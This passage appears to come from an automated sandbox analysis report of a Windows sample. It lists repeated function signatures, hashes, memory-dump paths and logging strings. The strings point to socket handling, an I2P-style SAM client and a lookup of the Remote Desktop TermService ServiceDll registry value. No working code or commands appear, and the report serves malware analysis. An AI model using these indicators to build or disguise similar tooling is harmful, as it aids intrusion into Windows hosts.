                                    • Opcode Fuzzy Hash: 7e03738c070cc10edd4cf49bda78ea93556b05bd29f8f147de0b161cd689fe03
                                    • Instruction Fuzzy Hash: 7DF08BD0E0D68381FA279B76EE002B922156F0ABC4F084131DD0C8B7B8EE6CE946C740
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: AddressErrorLastProcfflushfwrite
                                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                    • API String ID: 1224403792-3063791425
                                    • Opcode ID: 43ee0e03b75cf9c72b49b9727778b1161a663c20aa97baaba46f6adb6057179d
                                    • Instruction ID: b65a72e4d42be08a60d8b93d178e55b1e7d5a968d5671f350f240cfd40e0f72c
                                    • Opcode Fuzzy Hash: 43ee0e03b75cf9c72b49b9727778b1161a663c20aa97baaba46f6adb6057179d
                                    • Instruction Fuzzy Hash: 88F0ADD0B0D68782FA039B65FC001AD12226F26BC4F0C4672DC5D2B7A9EE2DA9438300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: AddressErrorLastProcfflushfwrite
                                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                    • API String ID: 1224403792-3063791425
                                    • Opcode ID: ceec6de64c1370c87e5f2edf0bd0264aab4e9bbf25e940707cd959db8840fb9e
                                    • Instruction ID: a58ca503682fd869ac0f57a29077949464f8854dfbb37d89460443d5c11d43c3
                                    • Opcode Fuzzy Hash: ceec6de64c1370c87e5f2edf0bd0264aab4e9bbf25e940707cd959db8840fb9e
                                    • Instruction Fuzzy Hash: 95F081D8A1D68791FA134F66EC8A6BD92516F84BC4F0C41B1DCCC6BB99EE2CE546C300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: AddressErrorLastProcfflushfwrite
                                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                    • API String ID: 1224403792-3063791425
                                    APIs
                                    • GetProcAddress.KERNEL32(?,?,00000000,0000027B435613D0,?,00007FF7AABD292B), ref: 00007FF7AABD22A3
                                    • GetLastError.KERNEL32(?,?,00000000,0000027B435613D0,?,00007FF7AABD292B), ref: 00007FF7AABD22D6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: AddressErrorLastProcfflushfwrite
                                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                    • API String ID: 1224403792-3063791425
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: AddressErrorLastProcfflushfwrite
                                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                    • API String ID: 1224403792-3063791425
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastLibraryLoadfflushfwrite
                                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                    • API String ID: 4085810780-3386190286
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastLibraryLoadfflushfwrite
                                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                    • API String ID: 4085810780-3386190286
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastLibraryLoadfflushfwrite
                                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                    • API String ID: 4085810780-3386190286
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastfflushfwriteshutdown
                                    • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> shutdown failed(sock=0x%llx,chan=%d,WSAgle=%d)$sock_shutdown
                                    • API String ID: 2143829457-932964775
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastLibraryLoadfflushfwrite
                                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                    • API String ID: 4085810780-3386190286
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastLibraryLoadfflushfwrite
                                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                    • API String ID: 4085810780-3386190286
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastLibraryLoadfflushfwrite
                                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                    • API String ID: 4085810780-3386190286
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastclosesocketfflushfwrite
                                    • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d)$sock_close
                                    • API String ID: 152032778-2221966578
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Openstrcmpstrlen
                                    • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$termsrv.dll
                                    • API String ID: 679246061-1413152910
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastfflushfwriteioctlsocket
                                    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                    • API String ID: 325303940-110789774
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastfflushfwriteioctlsocket
                                    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                    • API String ID: 325303940-110789774
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastfflushfwriteioctlsocket
                                    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                    • API String ID: 325303940-110789774
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastfflushfwriteioctlsocket
                                    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                    • API String ID: 325303940-110789774
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastfflushfwriteioctlsocket
                                    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                    • API String ID: 325303940-110789774
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastfflushfwriteioctlsocket
                                    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                    • API String ID: 325303940-110789774
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastsetsockopt
                                    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                    • API String ID: 1729277954-3534120083
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastsetsockopt
                                    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                    • API String ID: 1729277954-3534120083
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastsetsockopt
                                    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                    • API String ID: 1729277954-3534120083
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastsetsockopt
                                    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                    • API String ID: 1729277954-3534120083
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastsetsockopt
                                    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                    • API String ID: 1729277954-3534120083
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastsetsockopt
                                    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                    • API String ID: 1729277954-3534120083
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastsetsockopt
                                    • String ID: [E] (%s) -> setsockopt(SO_KEEPALIVE) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_keepalive
                                    • API String ID: 1729277954-536111009
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: memsetstrchr
                                    • String ID: [D] (%s) -> %s$sam3_recv_rsp
                                    • API String ID: 2564583029-4292814133
                                    APIs
                                    Strings
                                    • ebus_dispatch, xrefs: 00007FFB2273A2EF
                                    • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFB2273A2F6
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave
                                    • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                                    • API String ID: 3168844106-1717220914
                                    APIs
                                    Strings
                                    • ebus_dispatch, xrefs: 00007FFB2276132F
                                    • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFB22761336
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave
                                    • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                                    • API String ID: 3168844106-1717220914
                                    APIs
                                    Strings
                                    • ebus_dispatch, xrefs: 00007FFB23B0602F
                                    • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFB23B06036
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave
                                    • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                                    • API String ID: 3168844106-1717220914
                                    APIs
                                    Strings
                                    • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFB22701336
                                    • ebus_dispatch, xrefs: 00007FFB2270132F
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave
                                    • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                                    • API String ID: 3168844106-1717220914
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: cb44c17b4e47c61bceb64ef853c57834eac4735260689cd32846fd4a7b3e6c0b
                                    • Instruction ID: 72772b8673c10ed9cafe45aad5980bdd99ba1260919da5cd69bf31edb99e793b
                                    • Opcode Fuzzy Hash: cb44c17b4e47c61bceb64ef853c57834eac4735260689cd32846fd4a7b3e6c0b
                                    • Instruction Fuzzy Hash: 53F03023B0B106C2F963AA04B4417B995522F55378E8B0AB58D480A6F1AE3EA8878320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: e46899573921c1e84c6f510f508363e14cb84ebdf7ad9e79a4d83c456136e3d4
                                    • Instruction ID: 54bd699ae22562beec09e08ef17eb5b5a256da3638fa963e94642d4215f613aa
                                    • Opcode Fuzzy Hash: e46899573921c1e84c6f510f508363e14cb84ebdf7ad9e79a4d83c456136e3d4
                                    • Instruction Fuzzy Hash: 51F03023A0B106C2F963AA04B4417B995521F55378E8B0AB58D490A6F1AE3EA8878320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: 6a16524ac11222bf263ae38b72c6ef1abeee5a46696a02edfdfba4fb478cf8ca
                                    • Instruction ID: 030b448e08b1d9aa3eefe5524eabd899fdb9b589966e13d600e2de4ca03caef2
                                    • Opcode Fuzzy Hash: 6a16524ac11222bf263ae38b72c6ef1abeee5a46696a02edfdfba4fb478cf8ca
                                    • Instruction Fuzzy Hash: BCF05433B0B207C2F963BB04B4417B995521F55379E8B0AB5CD490E6F1AE3EA8C78320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: b4472d493916910336c3a184dc5fe2b6a72edf1b18ce426c0d0c23c479426e80
                                    • Instruction ID: c0a2e7e7b9d2896269db39d0b3f7c6517c3bc0fcd08a69a2047652da24dbc3c2
                                    • Opcode Fuzzy Hash: b4472d493916910336c3a184dc5fe2b6a72edf1b18ce426c0d0c23c479426e80
                                    • Instruction Fuzzy Hash: EEF05433B0B107C2F963BB04B4417B995521F55378E8B0AB5CD490E6F1AE3EA8C78320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: baac9c1114a98bed6eae314587cd68cb6fb42297a9dc9bc8ec8630a526df8742
                                    • Instruction ID: b51046235e59f39a8a5d9966367ab339c36a50904b4f04dbb66a8eb97c82f662
                                    • Opcode Fuzzy Hash: baac9c1114a98bed6eae314587cd68cb6fb42297a9dc9bc8ec8630a526df8742
                                    • Instruction Fuzzy Hash: D1F03023A0B106C2F963AA04B4417B995521F55378E8B0AB5CD490A6F1AE3EA8878320
                                    APIs
                                    Strings
                                    Memory Dump Source
